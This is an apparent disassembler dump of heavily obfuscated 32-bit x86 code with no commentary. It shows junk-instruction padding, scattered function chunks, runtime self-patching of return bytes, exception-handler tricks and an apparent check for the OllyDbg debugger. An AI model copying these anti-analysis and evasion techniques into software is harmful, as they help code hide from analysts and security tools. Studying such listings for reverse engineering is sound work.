loc_4472F8: ; CODE XREF: sub_459B87+1Cj
jmp loc_443E88
; END OF FUNCTION CHUNK FOR sub_454466
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_4472FD: ; CODE XREF: sub_44C791+9E60j
jmp loc_44B753
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
push edi
sub edi, ebp
sbb ebx, 573D5F99h
and ebp, 0B4F03256h
jmp loc_44EDAD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A030
loc_447316: ; CODE XREF: sub_44A030+2910j
lea eax, nullsub_492
mov byte ptr [eax], 0C3h
push esi
push 25669CA6h
and esi, edi
jmp loc_455372
; END OF FUNCTION CHUNK FOR sub_44A030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D082
loc_44732C: ; CODE XREF: sub_44D082+Bj
push 24005F50h
sub esi, ecx
jmp loc_43F450
; END OF FUNCTION CHUNK FOR sub_44D082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456DB3
loc_447338: ; CODE XREF: sub_456DB3:loc_44F179j
jge loc_441B36
; END OF FUNCTION CHUNK FOR sub_456DB3
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44733E: ; CODE XREF: sub_44917B+5995j
jmp loc_4434E8
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
add edi, 4CD7D4F8h
or eax, 103A26C2h
jmp loc_441B36
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_447354: ; CODE XREF: sub_45633E+14j
jz loc_450212
jmp loc_444052
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44735F: ; CODE XREF: sub_43CCC3:loc_4392DCj
push eax
push 0
push eax
push 2B8CE004h
pop eax
and eax, 0CB5DC86Ah
rol eax, 8
jmp loc_44A9B1
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_447377: ; CODE XREF: sub_44602A:loc_43AE03j
cmp al, 0A4h
jz loc_43EBFE
jmp loc_4470AE
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_447384: ; CODE XREF: sub_4481A2:loc_44C195j
; sub_4481A2+3FFCj ...
xor ebx, ebx
loc_447386: ; CODE XREF: sub_449217-1AD2j
; sub_4481A2-9F0j
mov eax, ebx
pop ecx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F506
loc_44738B: ; CODE XREF: sub_43F506+Bj
jmp nullsub_548
; END OF FUNCTION CHUNK FOR sub_43F506
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_447390: ; CODE XREF: sub_44EC11:loc_43AC29j
pushf
jmp loc_453602
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
loc_447396: ; DATA XREF: sub_4561E9+12o
add eax, ecx
pop ecx
mov eax, [eax]
or eax, eax
jmp loc_44359B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB1E
loc_4473A2: ; CODE XREF: sub_44DB1E:loc_458E22j
push offset sub_459485
jmp nullsub_358
; END OF FUNCTION CHUNK FOR sub_44DB1E
; ---------------------------------------------------------------------------
cmp esi, 0C466EC0Bh
jmp loc_45289A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_4473B7: ; CODE XREF: sub_4518D7+6j
pop ebx
rol ebx, 17h
cmp ebx, 2163EC12h
jmp loc_44A069
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
loc_4473C6: ; CODE XREF: ut7h7i2x:00449D9Cj
test ebx, eax
jmp loc_44E374
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D759
loc_4473CE: ; CODE XREF: sub_44D759-F865j
jmp nullsub_97
; END OF FUNCTION CHUNK FOR sub_44D759
; ---------------------------------------------------------------------------
loc_4473D3: ; CODE XREF: ut7h7i2x:0043A9C3j
jmp loc_439534
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_4473D8: ; CODE XREF: sub_44865D:loc_4446DBj
jp nullsub_71
or edx, 2B08D9B7h
and esi, 8DDBBB97h
xor ecx, 58210FA6h
jmp loc_440E17
; END OF FUNCTION CHUNK FOR sub_44865D
; =============== S U B R O U T I N E =======================================
sub_4473F5 proc near ; DATA XREF: sub_447D5B+12C18o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004455FF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455BD8 SIZE 0000001B BYTES
mov edx, 0CE3062ECh
call sub_44ED9F
call sub_453D8B
push 17724D73h
xchg edi, [esp+4+var_4]
mov edx, edi
loc_44740E: ; CODE XREF: ut7h7i2x:00451E7Bj
pop edi
sub edx, 41A6DA6Fh
jmp loc_455BD8
sub_4473F5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_44741A: ; CODE XREF: sub_44DF79-6E59j
push offset byte_44ABDD
jmp loc_44F76F
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_447424: ; CODE XREF: sub_446599-C50Aj
jnz loc_445683
jmp loc_452515
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
loc_44742F: ; DATA XREF: sub_450C02+11o
add eax, 22863207h
loc_447435: ; CODE XREF: ut7h7i2x:loc_44AC4Dj
push ecx
mov ecx, eax
push offset loc_44FB08
jmp loc_443B05
; ---------------------------------------------------------------------------
loc_447442: ; CODE XREF: ut7h7i2x:004561A3j
test ebp, ecx
jmp loc_444BCF
; ---------------------------------------------------------------------------
push 0F556635Fh
jmp loc_443A5F
; ---------------------------------------------------------------------------
loc_447453: ; CODE XREF: ut7h7i2x:00458D06j
pushf
loc_447454: ; CODE XREF: ut7h7i2x:loc_458CF8j
rol edx, 16h
xor edx, 0E275D215h
test edx, 200000h
jmp loc_44F4BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_447468: ; CODE XREF: sub_43F7A5:loc_43F7AAj
call sub_44DB79
loc_44746D: ; CODE XREF: sub_45292B+3937j
jmp loc_44EE72
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_447472: ; CODE XREF: sub_441765+7j
jmp loc_4596D1
; END OF FUNCTION CHUNK FOR sub_441765
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_238. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F774
loc_447478: ; CODE XREF: sub_44F774-372Dj
jmp sub_459A71
; END OF FUNCTION CHUNK FOR sub_44F774
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_44747D: ; CODE XREF: sub_441765-27A6j
jmp loc_4568DE
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_447482: ; CODE XREF: sub_44B5CF-DA80j
jmp loc_44A45E
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
mov ds:off_41D094, eax
lea eax, sub_44E5AB
call sub_450662
; START OF FUNCTION CHUNK FOR sub_43B847
loc_447498: ; CODE XREF: sub_43B847+9476j
jmp loc_45687E
; END OF FUNCTION CHUNK FOR sub_43B847
; =============== S U B R O U T I N E =======================================
sub_44749D proc near ; CODE XREF: ut7h7i2x:00453FB8j
; sub_455807+3p
; FUNCTION CHUNK AT 0043A566 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push edi
mov edi, ecx
xchg edi, [esp+0]
push offset loc_44C4C5
jmp loc_43A566
sub_44749D endp
; =============== S U B R O U T I N E =======================================
sub_4474B1 proc near ; CODE XREF: ut7h7i2x:0044FE39j
; sub_4585B6+Bp
; FUNCTION CHUNK AT 0043FB1B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004408B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448DB4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00449564 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00455E7A SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
js loc_44956B
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_439B17
jmp loc_448DB4
sub_4474B1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45002D
loc_4474CD: ; CODE XREF: sub_45002D:loc_44C643j
xchg esi, [esp+0]
jmp sub_444E04
; END OF FUNCTION CHUNK FOR sub_45002D
; =============== S U B R O U T I N E =======================================
sub_4474D5 proc near ; DATA XREF: sub_45601B:loc_43AA49o
call nullsub_456
jmp ds:dword_41D188
sub_4474D5 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_456. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test [esi+5A0000BEh], al
mov eax, [esp]
jmp loc_44A49C
; ---------------------------------------------------------------------------
loc_4474EF: ; DATA XREF: sub_44EC11+49FBo
mov [ebp-0Ch], eax
lea eax, [ebp-70h]
loc_4474F5: ; CODE XREF: ut7h7i2x:00440C0Cj
push edx
mov edx, eax
; START OF FUNCTION CHUNK FOR sub_45410C
loc_4474F8: ; CODE XREF: sub_45410C:loc_454CDDj
xchg edx, [esp+0]
; END OF FUNCTION CHUNK FOR sub_45410C
; START OF FUNCTION CHUNK FOR sub_449700
loc_4474FB: ; CODE XREF: sub_449700:loc_449716j
call sub_43BA74
loc_447500: ; CODE XREF: sub_43F1B2+1ADC7j
jmp loc_4402EB
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_447505: ; CODE XREF: sub_45742F-26EDj
jmp loc_44629F
; END OF FUNCTION CHUNK FOR sub_45742F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447E29
loc_44750B: ; CODE XREF: sub_447E29+8j
jmp loc_453528
; END OF FUNCTION CHUNK FOR sub_447E29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45612F
loc_447510: ; CODE XREF: sub_45612F:loc_43CD75j
xchg edi, [esp+0]
mov ecx, edi
pop edi
sub ecx, 0B886A697h
push offset loc_456F44
jmp sub_45421C
; END OF FUNCTION CHUNK FOR sub_45612F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_447526: ; CODE XREF: sub_43B9B1:loc_454081j
xor ecx, 0A93AA32Fh
rol ecx, 18h
xor ecx, 2444C4BCh
add ecx, 7107A59Dh
popf
xchg ecx, [esp-4+arg_0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_447544: ; CODE XREF: sub_44F43B-A796j
sub ebp, 0E3D5B44Dh
mov esi, ebx
pop ecx
sub ebp, edx
adc edx, 0BC3A17EFh
jmp loc_44F2D3
; END OF FUNCTION CHUNK FOR sub_44F43B
; =============== S U B R O U T I N E =======================================
sub_44755A proc near ; DATA XREF: sub_44941C-376o
xchg eax, [esp+0]
jmp sub_44ED9F
sub_44755A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_447562: ; CODE XREF: sub_44EC11-AFE9j
mov dword ptr [ebp+eax*4-70h], 73257325h
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 19h
jnz loc_43B58E
jmp loc_44A4CA
; END OF FUNCTION CHUNK FOR sub_44EC11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_44757D: ; CODE XREF: sub_449C6F+EE89j
jmp loc_443312
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
loc_447582: ; CODE XREF: ut7h7i2x:004493B5j
jmp loc_44FCE9
; ---------------------------------------------------------------------------
loc_447587: ; CODE XREF: ut7h7i2x:004466B1j
jmp loc_44D94E
; ---------------------------------------------------------------------------
loc_44758C: ; CODE XREF: ut7h7i2x:0043B2C7j
jmp loc_44996D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_447591: ; CODE XREF: sub_459DE7-1EEBFj
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_459DE7
; ---------------------------------------------------------------------------
push 7B52A79Eh
sbb ebx, 9017213Ch
jmp sub_440FC3
; ---------------------------------------------------------------------------
loc_4475A6: ; CODE XREF: ut7h7i2x:0043B21Dj
sub ebp, eax
; =============== S U B R O U T I N E =======================================
sub_4475A8 proc near ; CODE XREF: sub_4562F0+Bp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00453090 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004542B8 SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
xchg ebx, [esp-4+arg_0]
mov eax, ebx
pop ebx
jmp loc_453090
sub_4475A8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp ds:dword_41D0FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
js loc_448DED
mov eax, [esp]
jmp loc_43D06E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_4475CC: ; CODE XREF: sub_450FDE:loc_45A628j
adc edi, 5927720Eh
jmp loc_458F32
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_4475D7: ; CODE XREF: sub_455145:loc_439D0Bj
; sub_455145-8552j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 4742444Fh
jz loc_456EB1
jmp loc_44478C
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_4475EE: ; CODE XREF: sub_4433C5:loc_43FCFCj
; sub_4433C5+16F85j
push 0A00291F6h
pop eax
and eax, 0B6D1B0Bh
add eax, 56656C26h
xor eax, 8FD62AD0h
add eax, 19135F98h
add eax, ebp
jmp loc_4517B6
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
loc_447613: ; CODE XREF: ut7h7i2x:loc_454803j
jnz loc_43FD5D
jmp loc_445411
; ---------------------------------------------------------------------------
loc_44761E: ; CODE XREF: ut7h7i2x:loc_452A5Aj
jnz loc_4596A0
jmp loc_443EE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_447629: ; CODE XREF: sub_4497C1:loc_44FDE7j
jl loc_43E648
loc_44762F: ; CODE XREF: ut7h7i2x:00452564j
jmp loc_447696
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
mov edx, 0D8E32EDFh
popf
cdq
jmp loc_43E646
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_447640: ; CODE XREF: sub_44F495:loc_45206Dj
jnz loc_45951D
jmp loc_44F4EA
; END OF FUNCTION CHUNK FOR sub_44F495
; =============== S U B R O U T I N E =======================================
sub_44764B proc near ; CODE XREF: sub_44B43D-10037p
; ut7h7i2x:004444EBj
; FUNCTION CHUNK AT 00456732 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xor edx, 0DDBB289Eh
call sub_44ED9F
jmp loc_456732
sub_44764B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44765F proc near ; DATA XREF: sub_44F495-14E76o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A3D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442C88 SIZE 00000008 BYTES
push esi
mov esi, edi
xchg esi, [esp+4+var_4]
push 0D8955B6Dh
pop edi
rol edi, 1Ah
sub edi, 288EDE0Eh
add edi, 7170B531h
jmp loc_442C88
sub_44765F endp
; ---------------------------------------------------------------------------
locret_44767F: ; CODE XREF: ut7h7i2x:00439DC0j
; ut7h7i2x:loc_43A4E8j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455DCD
loc_447680: ; CODE XREF: sub_455DCD+15j
jmp loc_4438E4
; END OF FUNCTION CHUNK FOR sub_455DCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_447685: ; CODE XREF: sub_44064B+16E7Dj
setz al
call sub_45A2AD
pop ecx
shl eax, 3
jmp loc_4558C7
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_447696: ; CODE XREF: sub_4497C1:loc_44762Fj
call sub_449553
loc_44769B: ; CODE XREF: sub_452D3D+40C4j
jmp loc_443260
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4476A0: ; CODE XREF: sub_43AB62+3DDDj
jmp nullsub_191
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
mov eax, 0EFFDE014h
push esi
push 7C36D356h
pop esi
sub esi, 6BC19154h
add esi, 0DD7FDB6Bh
jmp loc_443BAB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440E5F
loc_4476C2: ; CODE XREF: sub_440E5F+A94Fj
lea eax, sub_459F30
mov byte ptr [eax], 0C3h
jmp sub_459F30
; END OF FUNCTION CHUNK FOR sub_440E5F
; =============== S U B R O U T I N E =======================================
sub_4476D0 proc near ; CODE XREF: .text:0040CEB8p
; ut7h7i2x:00454B38j
; DATA XREF: ...
; FUNCTION CHUNK AT 00449301 SIZE 0000000B BYTES
push edx
push 57BC3E90h
pop edx
xor edx, 0ECD22A61h
and edx, 0DD907289h
or edx, 9EC9C8A1h
jmp loc_449301
sub_4476D0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F9C6
loc_4476EE: ; CODE XREF: sub_43F9C6:loc_454DDAj
xchg ecx, [esp+4+var_4]
jmp loc_44B5E1
; END OF FUNCTION CHUNK FOR sub_43F9C6
; ---------------------------------------------------------------------------
push 0CDEAAA0Bh
jmp sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_447700: ; CODE XREF: sub_43DBEC:loc_43A6DDj
mov ebx, 1D42DDA2h
jns loc_43C33A
jmp sub_448503
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_447710: ; CODE XREF: ut7h7i2x:00451C93j
ja loc_441A3E
mov edx, [ebx]
; =============== S U B R O U T I N E =======================================
sub_447718 proc near ; CODE XREF: sub_439788+1B4D7p
; FUNCTION CHUNK AT 0044089F SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044F52D SIZE 00000005 BYTES
xchg ebx, [esp+0]
loc_44771B: ; CODE XREF: sub_439B67:loc_4484C7j
pop ebx
mov esp, ebp
jmp loc_44F52D
sub_447718 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_447723: ; CODE XREF: sub_44F495+Dj
mov byte ptr [eax], 0C3h
loc_447726: ; CODE XREF: ut7h7i2x:loc_4583BEj
jmp loc_4561D5
; ---------------------------------------------------------------------------
loc_44772B: ; CODE XREF: sub_44F495+1300j
mov eax, [esp+8+var_8]
push edx
call sub_446B90
push 96E81E9Ch
pop eax
jmp loc_44182F
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_44773F: ; CODE XREF: sub_449217:loc_4454E5j
cmp edx, 7C61090Eh
jz loc_447386
; END OF FUNCTION CHUNK FOR sub_449217
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_44774B: ; CODE XREF: sub_449217-F011j
; sub_449217-3047j ...
jz loc_451E35
or eax, eax
jmp loc_44C063
; END OF FUNCTION CHUNK FOR sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452EED
loc_447758: ; CODE XREF: ut7h7i2x:loc_43D529j
; sub_452EED-477Cj
push 2A5CEDFh
pop eax
or eax, 0ABFA221Eh
loc_447764: ; CODE XREF: ut7h7i2x:loc_449819j
add eax, 7618405Eh
add eax, ebp
add eax, 0DDE7D0BBh
jmp loc_43F4BB
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
loc_447777: ; CODE XREF: ut7h7i2x:loc_444E7Bj
; ut7h7i2x:00444E89j
add edi, 894979Eh
xchg edi, [esp]
jmp sub_44ED9F
; ---------------------------------------------------------------------------
push eax
ror eax, 6
mov ds:dword_44A898, eax
jmp locret_447FEB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_249. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_447795: ; CODE XREF: sub_444EAA+41EBj
jmp loc_4399EA
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43946A
loc_44779A: ; CODE XREF: sub_43946A+6j
jmp loc_457407
; END OF FUNCTION CHUNK FOR sub_43946A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_44779F: ; CODE XREF: sub_4481A2:loc_4531ADj
jz loc_44774B
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
loc_4477AC: ; CODE XREF: ut7h7i2x:0044E37Aj
cmp edx, 7C61090Eh
jz loc_447386
jmp loc_44774B
; END OF FUNCTION CHUNK FOR sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_4477BD: ; CODE XREF: sub_449217:loc_449226j
mov ebx, [eax+18h]
jmp loc_458A6C
; END OF FUNCTION CHUNK FOR sub_449217
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4477C5: ; CODE XREF: sub_4459EE+F808j
jnz loc_4568F8
jmp loc_45A649
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
ror ecx, 4
jmp sub_44D26E
; ---------------------------------------------------------------------------
loc_4477D8: ; DATA XREF: sub_452C88+4o
mov dword ptr [ecx], 10001h
lea eax, loc_4477F3
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_4477EE: ; CODE XREF: sub_44EB88-3FDBj
jmp sub_440E38
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4477F3: ; CODE XREF: ut7h7i2x:0043EF16j
; ut7h7i2x:loc_44359Bj ...
pop large dword ptr fs:0
add esp, 4
jmp loc_445A69
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_447802: ; CODE XREF: ut7h7i2x:0043A906j
jz loc_45A6EB
loc_447808: ; CODE XREF: ut7h7i2x:loc_44B398j
call sub_43CAF4
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_44780D: ; CODE XREF: sub_4423C1:loc_44AD48j
and eax, 7
mov [ebp-14h], eax
cmp dword ptr [ebp-10h], 3
jnb loc_45246C
mov eax, [ebp+8]
cmp dword ptr [eax-14h], 4
jnz loc_4574B0
mov eax, [ebp+8]
jmp loc_440654
; END OF FUNCTION CHUNK FOR sub_4423C1
; ---------------------------------------------------------------------------
loc_447832: ; CODE XREF: ut7h7i2x:0045267Bj
jno loc_450386
add ebx, esi
push esi
jmp loc_44E27B
; ---------------------------------------------------------------------------
loc_447840: ; CODE XREF: ut7h7i2x:00440967j
; ut7h7i2x:00440974j
or ebx, 67D993FEh
rol ebx, 5
jnb loc_45419E
; START OF FUNCTION CHUNK FOR sub_458C95
loc_44784F: ; CODE XREF: sub_458C95+Aj
jmp loc_43FF8A
; END OF FUNCTION CHUNK FOR sub_458C95
; ---------------------------------------------------------------------------
loc_447854: ; CODE XREF: ut7h7i2x:00449607j
jmp loc_442164
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_447859: ; CODE XREF: sub_45500F-190DFj
jmp loc_43998A
; END OF FUNCTION CHUNK FOR sub_45500F
; ---------------------------------------------------------------------------
xor edi, 5B78AFE4h
shl ebp, 15h
jns loc_4407C0
jmp loc_45419E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_447872: ; CODE XREF: sub_453E14-14263j
jz loc_44A5B7
jmp loc_450CAA
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
or ebp, 0D0775CDCh
jmp sub_458E89
; ---------------------------------------------------------------------------
loc_447888: ; DATA XREF: sub_440DB3o
push edi
push 17265714h
pop edi
sub edi, 9943463Ah
xor edi, 0D8C25FCEh
jmp loc_449D1F
; ---------------------------------------------------------------------------
loc_4478A0: ; CODE XREF: ut7h7i2x:00447FCCj
jnz loc_442F47
jmp loc_44FFB9
; ---------------------------------------------------------------------------
loc_4478AB: ; CODE XREF: ut7h7i2x:0044D375j
and ebx, 6E6EAEDFh
jmp loc_4442EA
; ---------------------------------------------------------------------------
jmp ds:dword_41D180
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
inc edx
add [bx+si], al
loc_4478C1: ; CODE XREF: ut7h7i2x:0045719Cj
jmp loc_44103D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451900
loc_4478C6: ; CODE XREF: sub_451900+467j
jmp loc_458DE4
; END OF FUNCTION CHUNK FOR sub_451900
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_4478CB: ; CODE XREF: sub_43A513+985Fj
jmp loc_44BBCE
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_4478D0: ; CODE XREF: sub_4497C1:loc_4397BAj
mov edi, edx
xchg edi, [esp+0]
push ebx
push 22347443h
pop ebx
jmp loc_45275A
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
loc_4478E1: ; CODE XREF: ut7h7i2x:loc_44BFB0j
jnz loc_449661
jnz loc_43D252
; =============== S U B R O U T I N E =======================================
sub_4478ED proc near ; CODE XREF: sub_44EC28+835Ap
; FUNCTION CHUNK AT 0043F64E SIZE 00000008 BYTES
xchg ebx, [esp+0]
pop ebx
call sub_454196
mov esp, ebp
jmp loc_43F64E
sub_4478ED endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_4478FD: ; CODE XREF: sub_444A12-98F7j
jnb loc_449C09
sbb eax, 0DD72571Dh
jmp loc_43EDBF
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
mov [ebx], ebp
xchg ecx, eax
jmp sub_447D5B
; =============== S U B R O U T I N E =======================================
sub_447917 proc near ; CODE XREF: sub_44ED9F:loc_4414B9j
; FUNCTION CHUNK AT 00443CFF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454241 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457633 SIZE 00000014 BYTES
add esp, 0FFFFFED8h
call sub_446073
loc_447922: ; CODE XREF: ut7h7i2x:00444696j
jmp loc_443CFF
sub_447917 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_462. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_447928 proc near ; DATA XREF: ut7h7i2x:00456125o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043930E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00446C5B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448423 SIZE 00000005 BYTES
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
mov eax, edx
nop
mov eax, [esp+4+var_4]
jmp loc_43930E
sub_447928 endp
; =============== S U B R O U T I N E =======================================
sub_447939 proc near ; CODE XREF: ut7h7i2x:0044DBEDj
; ut7h7i2x:00450BD0p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg esi, [esp-4+arg_0]
jmp sub_45341C
sub_447939 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_447945: ; CODE XREF: sub_44E5DC:loc_451D5Cj
rol edx, 1Ah
sub edx, 9B8D1447h
and edx, 92D1B4A4h
add edx, 0C22C01EAh
jmp loc_440171
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
